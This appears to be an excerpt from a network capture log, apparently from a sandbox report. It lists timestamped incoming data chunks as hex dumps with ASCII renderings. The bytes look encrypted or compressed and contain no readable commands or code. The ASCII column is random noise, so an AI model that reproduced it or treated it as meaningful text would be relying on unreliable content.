                                            2021-11-24 14:40:42 UTC198INData Raw: a0 eb df 19 4b 94 bc a7 d8 c3 84 6e 2b 5e b1 b2 17 5d 78 cf 30 24 eb 58 7d 95 57 de cf 20 bb f9 be 83 fc 22 a8 42 27 7f df 6a 73 8e 71 49 9b 7f db 07 91 c7 98 87 75 18 42 d5 88 e3 f6 70 db 43 ac f0 59 7d a5 a4 44 1f 09 26 96 9f bc 56 06 33 db 6c 09 02 64 a8 88 ff df 05 f0 33 49 c6 6b 5b f5 1a 8d 00 98 23 8e ea df 07 e2 3e 5c 22 32 33 4c e8 af 4f 9a a3 35 7e 5d d9 70 3b d5 0b d3 f2 b6 f6 fd 71 bc 45 33 18 72 7d 4e 18 73 48 3b 5d c8 1a 62 05 86 af ac ce 24 b6 fc 67 af a5 53 93 e3 1d b0 60 d4 db b1 0f 70 19 0d 74 4b a9 56 2a bf 11 73 31 32 ba 84 56 7b 2f dc ac 78 be e4 0b 6c 46 ed 0b 9f c6 00 8d de b4 e4 35 52 b3 87 69 29 b5 24 6f 33 aa a4 b3 fa d0 1a 8a 05 3f 34 17 9f 6e dd 06 6d d4 f1 82 f9 78 19 b1 d9 48 2a 98 1e ab 90 5d 06 cc 4b a7 62 20 1a 83 6d aa 04
                                            Data Ascii: Kn+^]x0$X}W "B'jsqIuBpCY}D&V3ld3Ik[#>\"23LO5~]p;qE3r}NsH;]b$gS`ptKV*s12V{/xlF5Ri)$o3?4nmxH*]Kb m
                                            2021-11-24 14:40:42 UTC199INData Raw: 34 22 81 1e a2 02 a5 a5 0d 76 73 30 4e 99 c6 72 b0 df 6a 9c e3 ba a5 1a 22 b1 23 7e be cb 45 0a 17 a0 3e 1a 17 85 41 e2 13 df f8 f1 da 22 26 24 3a 7c 19 84 99 cb 39 a6 af 39 ce 6c 5f aa af 4c 6b cb e0 41 63 d7 ee 3f de c6 5a 94 46 af 83 bb fc df 7d a5 6e 1d b1 ab 83 2b 54 77 44 ab 32 8f 38 d3 2a 30 89 0c c0 2b 91 ba 04 53 6d 9d df d2 71 ac 0a 78 33 23 53 73 30 60 00 22 97 3b 94 cd 1c cf 79 2d 96 0d f4 b7 d6 cd e0 71 46 33 3f a1 97 09 93 f0 34 a2 45 f3 c3 1b 28 37 3e 9a 79 12 87 61 95 16 a0 97 0b 21 bb c5 b3 99 b9 2e b1 f8 44 06 7b ea d5 63 f3 0f d4 53 0c 38 d8 0f fc f0 c6 fc 2b b7 45 d6 6a bc 6c e8 d3 f0 82 b6 63 f5 ac 7a c2 77 25 90 82 55 8b 52 95 e6 ba 45 51 58 e7 45 0c 35 ff 50 1b 63 80 22 df ea 42 e3 65 72 ac ac ea 61 b4 8e c2 4d fa 7d de 1b 08 26 76
                                            Data Ascii: 4"vs0Nrj"#~E>A"&$:|99l_LkAc?ZF}n+TwD28*0+Smqx3#Ss0`";y-qF3?4E(7>ya!.D{cS8+Ejlczw%UREQXE5Pc"BeraM}&v
                                            2021-11-24 14:40:42 UTC200INData Raw: 03 e4 f7 f9 d6 cc cb 72 4e 55 df b3 b4 f6 11 2f 96 d9 95 ee e5 91 46 23 3a b2 d5 47 5b 7b ab 0a 33 ff 61 77 9c 1c 8a e4 20 a7 e8 ae 85 c1 31 da 54 23 66 cd 55 76 8f 15 63 9a 75 ab 3b 91 c3 a7 8f 6e 13 4d d3 82 e2 9f 5d d5 33 91 c1 6d 08 8f ae 42 70 35 22 94 b6 d3 75 06 47 f9 67 1e 32 55 af 8f fb b0 32 ec 40 5a c6 72 2a f3 01 8b 32 9f 29 80 a5 f8 3f ed 30 56 23 31 56 0a d3 b3 76 bd ba 32 4e 05 84 40 20 c3 07 bd c3 d7 d7 fe 47 9b 44 33 4b 46 49 5f 1e 45 53 2f 38 de 0c 71 05 84 ab 9c ca 16 b8 c3 77 b8 be 69 86 86 2d de 76 c2 cc 8f 0a 66 38 3f 65 5a 9b 50 39 a2 1a 52 5e 1a b1 96 4a 43 32 d8 ad 2b ac f3 62 44 53 82 21 b3 df 31 98 d2 c2 d6 24 59 87 b8 63 3c af 29 6d 05 de 9b bb fd db 57 ac 19 21 25 11 88 0b cf 16 7b ef fe 8b 9e 49 76 a1 df 5f 27 93 17 df be 59
                                            Data Ascii: rNU/F#:G[{3aw 1T#fUvcu;nM]3mBp5"uGg2U2@Zr*2)?0V#1Vv2N@ GD3KFI_ES/8qwi-vf8?eZP9R^JC2+bDS!1$Yc<)mW!%{Iv_'Y
                                            2021-11-24 14:40:42 UTC202INData Raw: bf 37 98 36 e2 4b 2e 94 38 25 9a 32 32 a5 15 9d 04 a5 b2 0d 79 48 25 3e 8f a3 44 86 f4 60 a9 ee 82 b9 39 34 dd 44 59 a7 94 67 11 76 90 32 68 06 91 31 c1 7e ac da e8 85 0b 3d 45 08 74 07 b5 b3 cf 2e c3 89 31 ba 5f 43 ae 95 0e 59 d7 e6 79 72 d1 df 27 c3 a3 1d 82 57 89 b9 8b e3 de 67 b3 65 3a 91 a0 96 2f 39 31 69 a2 31 b0 31 c6 3d 06 fd 3d ca 27 8c db 11 53 19 92 ee ce 41 8c 3f 5f 35 24 55 66 28 12 26 50 89 2e 94 fd 06 d5 7d 29 85 09 95 9e c7 fa c7 78 43 33 28 b7 e3 3d 82 f6 0e 80 5d 81 fc 1b 2b 2c 0f 96 46 12 80 76 91 7b e3 91 1e 21 91 fb 86 f8 8a 3f ac 94 4a 00 6e c1 eb 5c fc 3f d4 4d 69 5f f3 1a ce c5 e8 ec 20 bf 26 c0 44 d3 63 e9 b6 f7 9b df 6b fe 9a 44 f8 66 40 b5 f6 52 9e 71 af cd 9c 45 4f 28 de 4a 0a 3c 8b 50 1b 63 9b 33 c9 f7 2d ea 73 63 f3 a9 ef 62
                                            Data Ascii: 76K.8%22yH%>D`94DYgv2h1~=Et.1_CYyr'Wge:/91i11=='SA?_5$Uf(&P.})xC3(=]+,Fv{!?Jn\?Mi_ &DckDf@RqEO(J<Pc3-scb
                                            2021-11-24 14:40:42 UTC203INData Raw: 75 e2 8a 9c 2c 08 87 80 c5 ae 12 7b cf f5 89 c3 c2 a4 7e 29 14 ce b3 c1 ff 13 41 85 f2 94 dd c3 a4 5b 27 5f a4 c6 2e 53 72 ab 10 24 fa 74 7e 98 56 91 fc 37 b0 e8 be 85 c0 38 9f 5f 25 77 e2 71 7e 84 1f 0a a7 7d c8 1e 91 c0 ae 96 79 13 7f ce 85 e9 98 33 f3 41 a3 e0 46 55 a4 b4 64 67 32 2e 8a a5 ba 5d 0d 33 db 6c 09 02 75 a3 92 ff c2 08 e5 47 47 cc 71 04 c4 16 9e 1a b2 22 94 e8 c3 3b fc 23 56 22 38 56 2b c4 a8 44 ac af 20 5f 46 c3 57 31 c2 0d a1 cd a7 f7 f8 6a 94 37 05 04 01 6e 4e 01 02 6f 3d 56 ef 16 7f 01 da 8d b7 c5 11 ad e2 62 a3 b9 62 85 c3 00 d5 70 c4 db 87 15 6d 7c 1b 7f 4d a1 56 24 a5 74 66 2a 2c b7 8f 43 6c 32 d4 b9 19 aa e8 78 45 5a 82 34 a3 c5 61 8d de c0 e8 13 48 a5 a6 47 3f bf 01 67 21 c4 e9 b5 f6 c8 08 bc 1e 25 33 04 b1 0b e5 26 66 f1 fe ec f9
                                            Data Ascii: u,{~)A['_.Sr$t~V78_%wq~}y3AFUdg2.]3luGGq";#V"8V+D _FW1j7nNo=Vbbpm|MV$tf*,Cl2xEZ4aHG?g!%3&f
                                            2021-11-24 14:40:42 UTC204INData Raw: 9f c8 7f d1 d8 8a c3 59 98 ca 06 b7 35 fd 37 ee 5c 21 a6 2f 27 82 25 2f b4 1e cd 33 a4 a5 0d 7e 42 3b 6e 9d b4 51 b4 d4 7a ad fe ee 99 04 33 d4 36 1b 88 fd 50 3f 19 ba 29 0d 31 88 54 f5 13 ee f4 eb e4 31 29 03 21 6f 06 b1 94 cf 39 d4 e8 3b df 4c 79 99 a5 21 48 d1 f7 4f 74 a3 e9 23 dc d5 3f 95 60 b4 b1 88 e6 c5 6c b2 00 0e 80 a6 ac 0a 3a 42 7f a2 24 b3 3c c4 3d 27 89 3c ca 32 be 9f 18 45 3f a8 d8 cf 49 b5 3c 7e 41 05 55 73 06 7e 0c 52 92 31 81 e0 31 f7 66 29 93 01 e7 d9 f6 e1 d9 72 45 23 3f c4 f1 1c f6 e3 19 e1 73 e9 c3 7e 02 2a 0f ef 53 0a 9d 7c 82 16 a0 84 1e 34 ba d2 86 eb 97 34 a4 f7 59 20 68 ec d3 7e 9d 0e d9 45 08 4a c6 1c fe ff ec fd 35 97 54 d0 46 a1 00 d7 d3 e7 a6 ad 63 f1 8b 78 c5 57 57 aa 99 53 fb 56 9f e7 83 45 56 6d fa 59 10 22 ff 70 1b 63 8d
                                            Data Ascii: Y57\!/'%/3~B;nQz36P?)1T1)!o9;Ly!HOt#?`l:B$<='<2E?I<~AUs~R11f)rE#?s~*S|44Y h~EJ5TFcxWWSVEVmY"pc
                                            2021-11-24 14:40:42 UTC205INData Raw: 18 a8 b4 13 00 e9 fb ee f3 78 0a 79 f8 90 a5 2f 28 95 87 cd a5 24 03 ff e9 8a c3 ce a6 3e 7d 30 c4 a0 9a c0 13 48 84 d0 80 c3 ea 99 53 36 5f a7 c1 2e 53 72 d8 59 2d e9 61 4d b8 5c bd e0 27 a6 ec 83 82 e8 3a b5 45 27 7e dd 75 72 99 10 7e 9d 7d c5 06 f4 c7 8e 9a 45 3f 61 d9 80 f3 92 56 fb 5d 83 f9 44 52 ab ac 6e 6f 34 39 9b a5 ba 5d 0d 40 bc 5a 04 2e 45 a3 8c b2 f3 0e f9 5f 4b c0 6b 6d d8 1d 99 45 85 22 93 d4 fc 33 f4 3e 52 38 3b 17 39 d5 b3 76 9e af 28 48 61 d5 77 3d c3 0b b0 d0 be ec ff 76 fa 64 22 0f 1b 74 4c 3f 5c 51 21 4c d4 0f 66 0d 9b a0 ab ab 30 bc f7 66 b2 98 77 95 ef 17 de 60 b1 c8 8b 0e 5c 3b 2c 7e 4e b8 57 4b ac 11 41 01 1d b6 80 56 5c 5d fe ac 0c 9b e9 6a 58 47 82 21 b3 df 28 87 da d3 d2 15 52 b4 a5 68 3f b4 36 08 05 d3 9a a6 f6 d1 79 bb 1f 21
                                            Data Ascii: xy/($>}0HS6_.SrY-aM\':E'~ur~}E?aV]DRno49]@Z.E_KkmE"3>R8;9v(Haw=vd"tL?\Q!Lf0fw`\;,~NWKAV\]jXG!(Rh?6y!
                                            2021-11-24 14:40:42 UTC207INData Raw: 40 56 5d 2f 20 46 a0 cd 9a 60 49 ac ba 53 f1 df 96 df 3a 9e c0 32 a7 37 ec 45 ca 4c 16 85 32 3e bd 25 28 a4 00 b9 76 b9 a3 16 45 72 3a 5b 8e 87 57 bc df 7a c8 db 8b be 29 2b d8 21 75 be 94 77 11 02 a4 1c 04 2a 99 5f f3 13 ff e4 f6 f1 26 3d 6b 03 7c 05 b1 87 de 31 c3 86 28 ba 60 4b b6 8f 20 5d c9 e6 44 72 a3 fb 32 da c2 39 8f 4e be b2 8c 93 f4 67 b6 69 1b 8a bc 9e 2b 3a 45 2d 9f 3a b0 14 dd 3b 20 e4 2a c1 32 e1 bc 13 42 32 9d ca d2 40 ad 2d 0c 06 33 44 57 24 60 00 4c 84 5e 87 f7 21 fe 4c 39 96 16 f0 b7 d6 8e dc 4d 77 28 29 94 f8 07 98 f0 6b 86 55 f5 ee 32 29 20 1c 83 50 08 96 43 9f 7f 8d 82 7b 32 ab c3 89 da 97 2b af e0 2d 02 7f ea e3 58 f4 2e de 63 06 4d f8 1a 91 d2 ec ea 02 ba 47 d0 6a bc 75 ea c2 93 b3 b1 68 da 8d 78 d4 62 51 d8 b4 44 9c 6c 9e c5 8b 43
                                            Data Ascii: @V]/ F`IS:27EL2>%(vEr:[Wz)+!uw*_&=k|1(`K ]Dr29Ngi+:E-:; *2B2@-3DW$`L^!L9Mw()kU2) PC{2+-X.cMGjuhxbQDlC
                                            2021-11-24 14:40:42 UTC208INData Raw: ed 8e 16 c5 0d 12 70 95 de 09 82 12 a8 91 05 6e fa e3 87 ce 72 79 4e f2 93 fd 19 3f 85 9b d0 a2 23 7a 82 d3 8b ce db bf 7f 4e 27 dd a4 dc eb 76 48 94 c8 be f0 dc 92 46 29 58 b8 cb 47 7b 79 df 1c 32 e9 76 67 85 5b b0 eb 13 b1 fa af 81 cd 3a a3 27 21 77 e6 5a 56 8f 15 78 91 61 d8 33 95 d9 82 82 63 76 42 cf 80 f2 9f 43 de 4a c4 d4 45 49 ca 82 4d 70 32 20 b9 be a3 4b 63 60 c5 7a 09 38 5c e8 b3 e9 de 15 fc 5e 4b 8d 4c 61 c5 1a 8b 29 9f 3d 86 ff d8 3d e2 79 79 22 24 3b 2d d5 a8 7e 8d a8 6f 69 5a de 72 26 c8 6e b4 c1 a3 dc c5 6a 8e 56 3a 2d 1a 63 58 05 4f 5c 24 75 fe 12 7d 16 8d ce 9b d9 07 b8 e4 66 8e be 75 84 e5 0c df 61 c8 af 89 1f 77 23 0c 74 5c a1 57 3f b9 0d 35 39 3b aa be 67 4e 2d d8 aa 11 ac f8 0b 7b 41 e3 0a bf df 18 ea d4 c4 e8 15 4d a2 ab 60 33 b2 3c
                                            Data Ascii: pnryN?#zN'vHF)XG{y2vg[:'!wZVxa3cvBCJEIMp2 Kc`z8\^KLa)==yy"$;-~oiZr&njV:-cXO\$u}fuaw#t\W?59;gN-{AM`3<
                                            2021-11-24 14:40:42 UTC209INData Raw: 6a 4b dd 5d 43 33 5c 17 2f 27 8e 4e 34 18 59 7e 1e dd ad db 14 24 ca 3a 9f b4 8c ee b0 54 ca a5 42 da 55 96 47 83 3f 70 c5 53 40 ef 41 49 51 fd c3 73 ca c6 7f 08 42 4c 1e fc d4 b0 44 b4 0e c9 8d fc b5 6e 47 b0 45 15 cc 94 27 7d 78 da 5d 6f 43 fe 30 89 02 2c 38 86 83 51 3d 43 6e 1f 79 bd ee b9 59 86 ea 5d b4 24 22 da cb 44 36 a2 84 29 1a ae ab 62 aa a3 5b e9 2a de dc f8 81 31 c8 c5 20 69 f7 52 36 4a 54 30 20 c9 54 dc 50 ae 48 52 8f 41 bd c6 2c c9 f6 e7 7f 4d 7e b2 a5 1a 57 0a 41 57 22 87 98 1c 60 22 f0 4c 60 77 53 81 0e 4d f6 e4 70 dd 82 8f 94 15 37 66 4d d6 17 bf f3 a4 6b f3 b0 54 b7 5e 47 42 6f 6f c0 75 f5 1b e2 96 2e e4 fb 84 dc 37 03 84 fd 4c 41 65 25 79 12 9d 9c 0c 97 47 95 23 68 36 87 ee 64 84 09 67 45 d2 27 aa 35 d4 20 87 be 8e f3 d7 04 9c ce 18 b0
                                            Data Ascii: jK]C3\/'N4Y~$:TBUG?pS@AIQsBLDnGE'}x]oC0,8Q=CnyY]$"D6)b[*1 iR6JT0 TPHRA,M~WAW"`"L`wSMp7fMkT^GBoou.7LAe%yG#h6dgE'5
                                            2021-11-24 14:40:42 UTC210INData Raw: 1f c6 01 d2 51 5e 26 4f ac e2 56 ab 8c 1f 4c e0 35 5b 73 9d a5 e5 af f7 d6 bd 4b 20 34 36 35 70 2a 1c 0d 32 c1 81 9b b0 42 4e fd a2 7d 56 fb b7 ec 53 52 9a 94 fe 89 91 18 32 85 89 00 4b c9 e7 0c 3b 0d 0f ef 06 24 1f 96 ce fb 30 fa 74 fb bc f5 a8 94 bf 20 ed 07 ce 00 de e0 ff 88 46 ca 35 b7 fc c1 dc 2d 2b 49 24 79 d5 f1 fe c2 2d 38 78 f0 80 28 ac 64 61 2d ee 92 69 b8 35 a1 68 cc e4 43 a9 cf 44 eb a6 f5 8f 22 78 55 c1 40 4f 2b 5c 1c 29 29 83 5c 2d 25 47 62 0c c3 ab f8 17 39 c4 b8 1d a5 be 6e 20 58 d2 a5 46 c7 49 19 c8 86 21 71 c2 7d 47 fc 40 53 d7 6c ce 6a d6 da 60 1e 27 48 3c e0 c0 20 d8 b0 10 c8 90 e8 fc 68 46 b9 57 1b db 84 25 7d 63 c6 de e5 42 e2 31 92 01 2d 10 84 9b 43 d0 e5 49 5e 65 c5 f2 3a c5 a7 fd 4e 3b 7c 25 d4 c4 4e 36 aa 9f 3f 14 22 23 47 a0 ad
                                            Data Ascii: Q^&OVL5[sK 465p*2BN}VSR2K;$0t F5-+I$y-8x(da-i5hCD"xU@O+\))\-%Gb9n XFI!q}G@Slj`'H< hFW%}cB1-CI^e:N;|%N6?"#G
                                            2021-11-24 14:40:42 UTC211INData Raw: bc f6 4e 4b 56 90 68 ae 6d 48 2e b9 fa 4d 77 ce db 62 21 91 90 f7 67 9d 60 cc 0f 48 a3 d2 68 74 fc 1c e6 8f ca a2 80 1e 9a e3 4e d7 b6 f1 24 47 7d 57 40 02 a4 39 41 9e e8 c7 dc 3b 5d 14 0c 96 3c 77 14 af b0 9a 25 99 b5 92 03 d6 4b 9d 70 b8 79 b0 c1 d0 f2 cd cb e1 a1 e2 0e 57 ff 92 d4 fd 84 c9 99 16 7d 52 78 a2 cb df 3c 07 3c df 89 af 2d d1 8d ee 34 cc 42 85 1b 15 7b c5 c4 e8 5e 6d 52 8f c2 3f 50 42 ed 6d 35 5c 1f 9b 75 b6 61 f8 19 32 4d b6 f8 ce f1 ab 66 6f 0a ef af 5f e2 76 ad f9 61 6b 95 92 9a 98 17 16 28 15 df db 57 5f fb eb bf ce 5f 0b b1 95 eb 35 be d6 15 27 48 b9 c6 36 9f 64 ad fc a1 e4 ac aa fc 26 59 3f da bc 5a 39 0e 29 44 57 89 08 17 ec 37 cc 0e 47 df 8c c4 fe c6 51 fa 25 47 01 92 16 16 e6 71 08 e1 00 29 7c f6 ba e5 f3 1f 6b 0a b3 eb 83 eb 36 b8
                                            Data Ascii: NKVhmH.Mwb!g`HhtN$G}W@9A;]<w%KpyW}Rx<<-4B{^mR?PBm5\ua2Mfo_vak(W__5'H6d&Y?Z9)DW7GQ%Gq)|k6
                                            2021-11-24 14:40:42 UTC212INData Raw: f3 7e d1 f7 21 64 81 24 d1 1b c7 ab c4 0d c0 45 5f 2c 44 8d ec 5f bd 09 b3 5c 9a 36 4f 73 94 b4 d7 2c 58 da a1 42 22 08 24 a1 e0 b4 bf 66 3d dc 8e 87 ab 4a 5d 62 0f 6f 58 f2 a3 f7 43 75 15 bc f0 14 7b 1f 27 ba 9a 17 5d 4b ef 04 29 12 01 e9 07 36 03 ad d5 f7 ae 56 78 e8 a0 c8 a8 98 b4 37 e8 01 c1 12 de bc ec 9b 5c d7 38 ab e0 fa d0 3d 26 4b 32 79 d5 e9 ed 4c e5 24 03 74 35 38 c4 6b e5 82 f1 b5 64 b6 ab 0d 74 48 49 42 a5 4d e5 f1 9a e9 81 bd a5 40 d8 5d 4c 28 52 1a 2e 2e 86 55 23 b9 c2 7e 0c d8 a5 f5 1d 38 d6 b2 37 b7 bc fa a3 d8 55 a4 53 53 1b 8d 57 06 a6 70 c9 48 54 6e d9 5a c3 ed 8d 78 c4 c8 70 9a 87 47 2c 95 ce 2d dc a3 8f 88 9e 87 d4 77 49 b9 4e 1b c9 85 a6 b5 6a c5 dd a5 5f f9 11 87 01 2c 0c 88 85 40 45 57 cf 84 6a c2 61 fb 52 a8 e6 50 d6 38 49 da ad
                                            Data Ascii: ~!d$E_,D_\6Os,XB"$f=J]boXCu{']K)6Vx7\8=&K2yL$t58kdtHIBM@]L(R..U#~87USSWpHTnZxpG,-wINj_,@EWjaRP8I
                                            2021-11-24 14:40:42 UTC214INData Raw: 15 a2 fd 07 4e c3 cb c2 1a 92 1a a9 7e 75 5e 73 8f 67 29 51 51 34 d8 eb 48 6e cf c3 63 39 8e 9c df 74 0d d3 fd 11 2b be d7 60 70 fa 01 e3 9a d0 bb 80 07 9a e4 4e d9 9e f6 25 4b 65 5c 46 07 a2 39 40 89 d3 ce c6 24 51 9a 8d 86 01 63 13 a5 b0 9a 36 81 ad 9f 16 e7 42 99 79 b7 fd 3b 42 d7 61 0f cf ee 23 66 13 58 62 cf d8 e3 8c c4 94 2b 79 52 77 20 c9 de 31 1c 32 c1 89 af 2d 65 cb fc 5f d9 5a 88 08 0e 61 da c4 f1 5e 6a 5d 87 c0 2f cf fe fe 66 00 5e 56 89 4d 22 ea 7b 02 b1 03 ad ff 5d ea a3 76 e0 44 ef bb 4c fb 65 a6 e5 fe 6b 93 88 06 dd 03 02 28 fe ec 52 eb 52 ee e5 a2 cd 59 0d a2 9e f1 bf ba 49 5d 21 55 bf dc ba 9c 67 ad bc ba e1 b2 a1 ef 2b 4c 3e d4 b3 44 34 18 ab 58 44 8f 1d 12 f5 33 ce 82 5a ca 87 c2 eb a9 5e d4 29 4e 1a 9a 12 10 e0 64 18 75 8b aa 7b e9 ba
                                            Data Ascii: N~u^sg)QQ4Hnc9t+`pN%Ke\F9@$Qc6By;Ba#fXb+yRw 12-e_Za^j]/f^VM"{]vDLek(RRYI]!Ug+L>D4XD3Z^)Ndu{
                                            2021-11-24 14:40:42 UTC215INData Raw: 14 8e 8d e4 83 15 04 fa b6 25 46 f5 78 c2 f1 34 77 87 22 cc 18 2c 12 ce 0b d3 45 47 22 4d af e2 44 86 8c 0c 4b 9b b7 c5 73 81 20 85 a0 fb cd bd cd b0 29 36 35 b1 38 00 6a 33 d2 95 9b a9 57 51 e5 a3 68 5e ee 2a b0 53 0e 9c 81 e8 93 97 0b 2e be 9a 0a 41 c1 ee 1d 20 10 13 f5 98 0d 03 be c5 fb 29 fa 7f f4 2c 45 a8 93 a0 35 ff 8d d2 01 c9 c7 98 92 5a d5 27 b7 eb e9 db 3e 26 46 29 63 49 73 fe c0 79 24 0c f3 92 a9 94 6b 0d 26 d7 95 77 27 10 be 5a 48 61 5f b2 c7 50 ea b9 e0 96 1f 65 49 c0 5e 49 32 5e 08 29 2d 80 41 2d 36 74 78 08 d0 b9 7a 8c 24 ca 3b 5a a2 c8 e1 a4 4b 4d 3c 40 c0 da d8 4b 89 2d f0 87 53 53 fe c2 ea d3 62 d8 64 48 cf 60 14 29 5c 2f 7e 77 32 d7 bf 07 cf 89 e0 ce eb da b9 4c 13 cc b4 25 6e f7 49 5c 62 44 fa 39 9a 16 b1 98 8b 8d 4b 56 45 4c 1b 76 d5
                                            Data Ascii: %Fx4w",EG"MDKs )658j3WQh^*S.A ),E5Z'>&F)cIsy$k&w'ZHa_PeI^I2^)-A-6txz$;ZKM<@K-SSbdH`)\/~w2L%nI\bD9KVELv
                                            2021-11-24 14:40:42 UTC216INData Raw: ff 17 7a 11 d2 47 ac 9e 2a 8d 16 17 a8 00 85 0e c7 ef c4 18 13 92 aa 34 7b 43 76 97 75 a9 70 4d 22 b1 f2 4d 73 d7 de 6f 24 8c 91 f0 76 1f 51 cc fc 2e a3 d2 68 77 f3 1c e6 82 cd 57 9d 1b 85 e0 41 dd b8 ff 21 43 65 48 c8 ab a1 3e 41 8a 66 68 dd 3f 48 9c 98 9c 3c 6e 33 a0 a5 97 35 9b a2 95 14 db 4d 9d 71 a0 74 aa 4b cd e5 6f d8 f6 aa f7 16 6a e2 8d dc f8 85 cf 97 3d 74 54 6d a4 e9 c0 32 09 34 c8 92 a3 34 e3 83 f3 3c d9 4d 97 1f 0e 74 c1 c8 6e c2 60 52 8f ca 39 6d 46 f1 63 23 59 45 8d dc 22 62 f9 91 21 c0 39 eb dc 72 aa 75 e2 85 e3 a1 53 64 ea a1 f7 7e 66 8c 19 06 8c 88 8b 3c 97 ff d8 5b d9 67 ea a2 ca 5c 1f a7 90 fb a5 29 ce 02 ab 50 ae 56 b1 96 6b 3e 71 10 e7 b1 ae e6 32 c7 bb cd b5 53 3e 17 b7 51 42 91 04 92 55 3a c2 86 4e c8 83 d6 e4 a8 51 d2 2f 4e 1a 96
                                            Data Ascii: zG*4{CvupM"Mso$vQ.hwWA!CeH>Afh?H<n35MqtKoj=tTm244<Mtn`R9mFc#YE"b!9ruSd~f<[g\)PVk>q2S>QBU:NQ/N
                                            2021-11-24 14:40:42 UTC218INData Raw: 3c b3 fd f6 99 47 f0 1e 66 95 62 0b 94 10 08 90 0c 99 0b a3 2a 4c ef f0 3b eb bc 8e 83 2a c7 18 c5 fe d4 83 1b 5c c2 db 4d a5 eb 48 bd 0b f2 4c 09 c7 57 52 97 b3 45 42 e4 58 47 42 27 26 22 b3 f3 24 8e 88 26 cc bd 83 be df a0 f1 3e 85 58 ee 2b 25 50 e6 ad 87 ea 93 9d 17 a0 5c 86 82 a3 db e1 0a 3a 12 01 ef 14 25 03 ad ce e5 24 fa 74 ee b3 ce bc b6 b9 31 fc 8f 27 12 c2 db f9 92 5c de 32 a2 e4 fc d6 07 26 5c 2f 7e 46 f1 75 43 ea aa fd e3 92 ab 34 78 76 a3 1b 92 6f ad 3b 35 0f 4f 6e 45 bd c6 51 f0 b3 f9 12 06 6d 5a 5d b1 4b 35 5e 13 3c 2c 88 4a 11 38 4e 6d 83 5c aa e9 95 c9 d4 bd 1d b2 a2 ed ad 44 d0 b8 5d cf 59 9f 45 85 3e 7f d6 dc 7f e8 60 59 d3 7e 4d 9a c4 cf 42 18 25 5b be 10 d4 b0 0c bd 09 ce 91 eb d6 68 55 31 91 06 cf 9c 23 5c 74 de 55 79 c0 2d 3b a7 10
                                            Data Ascii: <Gfb*L;*\MHLWREBXGB'&"$&>X+%P\:%$t1'\2&\/~FuC4xvo;5OnEQmZ]K5^<,J8Nm\D]YE>`Y~MB%[hU1#\tUy-;
                                            2021-11-24 14:40:42 UTC219INData Raw: 04 f1 91 fa a1 bb 29 9a aa 77 73 f8 18 6c 96 4f 49 be 1b b0 88 13 12 be 6e 8e 1f 46 ef ca 14 96 06 b3 71 73 5e 73 86 64 2a d5 4c 34 30 fe 4a 53 d1 cc fe b9 82 89 f8 56 1d 43 49 91 26 ab da 79 66 7d b9 e7 94 4c af 98 33 87 f7 c7 db b4 dc 24 50 6a d8 d1 06 b6 b9 54 9f e0 d2 59 05 47 b4 94 95 26 e8 2e bc a8 82 3d 94 a2 90 18 db 58 84 71 a0 74 aa 4b c6 ea 4e d2 f6 b2 fe 10 54 e3 9f c8 ff 9c ca 9a 16 7e 41 60 a9 c7 ce 4a 01 54 dd f4 b3 0a e4 ba ee 04 d1 51 8c 1b 0f 79 db dc f1 5f 60 52 9a de 20 51 5a f2 60 20 45 5a 80 57 a7 73 7b 15 2c 46 98 ec c1 76 a0 74 66 0c fb ba 47 fa 77 b5 eb 61 72 80 86 9a 98 03 0e 3c 85 7a d2 4f 5a e6 fc 26 ca 51 04 ae 8d fc a5 c2 c1 30 2a 48 b9 c9 b1 8f 73 32 f4 b6 e6 b7 b2 e4 3e 41 34 dc ba 4f 36 1c a8 5c 44 9d 91 17 e3 b6 d7 87 55
                                            Data Ascii: )wslOInFqs^sd*L40JSVCI&yf}L3$PjTYG&.=XqtKNT~A`JTQy_`R QZ` EZWs{,FvtfGwar<zOZ&Q0*Hs2>A4O6\DU
                                            2021-11-24 14:40:42 UTC220INData Raw: ca 0c 5a c6 45 08 56 aa e9 d2 93 bc 57 ef 76 4c 55 70 fa 6e 9c 62 09 86 90 ec 9e 1d 19 f2 ab 2d 4e fd 70 df f9 3c 6a 8f 2a c4 0a 45 1a c6 03 ce 4d 42 22 4f ad ec 4a af 8b 1e 5e 89 36 5c 72 93 a1 c5 ae f5 d8 af 4c 29 28 24 b4 f1 36 0e 64 2e dc 9d 86 ac 5f 4c e0 be 6d 56 fc ab f0 41 67 94 89 e2 94 9f 05 20 b0 94 02 4f c9 e6 06 27 1c 0f e7 1a 38 0d a3 c0 e6 2c e7 7a e6 ae c0 b5 96 bd 30 ed 0f cf 1c cc d5 f1 95 58 d7 2b aa ee f4 fe 2f 21 ce 3f 6b 54 70 d4 42 f8 aa 11 f6 80 2a ad 79 64 23 f7 95 65 a4 29 b4 7b 4d 68 42 b7 cf 08 f7 ba 68 93 3f 64 48 dd 5d 4d 35 5c 14 21 29 80 40 30 38 5a 7f 02 c5 c3 fb 15 a5 d8 ba 1a b0 ac ef b1 59 cc a5 41 d2 5b 98 44 87 3f 71 c7 5d c6 ef 40 5b d1 6c cd 76 ca c6 62 1a 27 49 3e fc c6 30 d8 b1 0e c8 8c ee 4c 6a 47 b1 e4 9b c9 94
                                            Data Ascii: ZEVWvLUpnb-Np<j*EMB"OJ^6\rL)($6d._LmVAg O'8,z0X+/!?kTpB*yd#e){MhBh?dH]M5\!)@08ZYA[D?q]@[lvb'I>0LjG
                                            2021-11-24 14:40:42 UTC221INData Raw: 01 91 ce 3b 91 32 05 f8 d6 01 c7 77 95 f5 9d 45 51 5c ed 4f 3a 28 9a 74 0b 63 bb 28 c2 d6 48 fb 73 7b 8c 83 e3 78 a2 87 ff 2b f2 7d e7 1a 0d 2c 1d f6 07 89 50 38 4f f0 95 2e 16 a0 ad 42 06 ea f4 93 05 7a 73 e7 32 23 a9 f2 4c 57 dc 3c c6 ba e2 d5 f8 6a f2 83 35 ab db 90 74 37 11 2f 21 6b c1 5f 39 e8 d8 cd d1 18 6c b4 b0 a8 1b 19 76 c2 d8 ed 51 e8 d1 a9 13 d9 65 a1 50 8a 08 d0 36 b6 94 06 b4 9a cd c1 1f 40 df a0 b7 8c f1 af f1 54 10 25 5b ac c3 c2 39 01 3c dd 95 b3 3f e4 8b ee 36 d1 47 8b 15 12 7c c6 d9 ed 43 68 5a 87 c2 3d 4d 47 f0 68 28 59 47 9c 5f a3 73 7a 10 30 43 b8 ed dc 73 a2 64 61 04 e7 a7 42 e7 6b a8 f7 7c 6e 9d 9a 87 9d 0b 0a 3a 97 fe d3 4a 5a e6 ee a2 cb 57 03 ac 90 f9 b7 ab cb 10 29 55 bc d4 b4 92 76 2f f1 bc e1 b1 af e1 23 44 3a d4 b2 47 3c 1c
